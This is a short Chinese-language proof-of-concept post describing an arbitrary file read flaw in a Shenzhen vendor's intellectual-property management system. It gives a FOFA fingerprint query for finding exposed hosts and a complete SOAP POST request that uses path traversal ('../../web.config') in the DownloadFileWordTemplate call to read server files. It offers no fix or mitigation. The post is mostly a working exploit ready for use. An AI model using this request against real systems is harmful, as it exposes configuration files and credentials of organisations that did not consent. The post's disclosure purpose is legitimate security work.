漏洞描述
深圳市唯德科创信息有限公司(以下简称:唯德)于2014年在深圳成立,是专业提供企业、代理机构知识产权管理软件供应商,唯德凭借领先的技术实力和深厚的专利行业积累,产品自上市推广以来,已为1000多家企业及代理机构提供持续稳定的软件服务。唯徳知识产权产权系统DownloadFileWordTemplate存在任意文件读取漏洞。
FOFA:
body="/Scripts/JSCOMM/Box.js"
漏洞复现
POC:
POST /AutoUpdate/WSFM.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/DownloadFileWordTemplate"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<DownloadFileWordTemplate xmlns="http://tempuri.org/">
<fileName>../../web.config</fileName>
</DownloadFileWordTemplate>
</soap:Body>
</soap:Envelope>
发包测试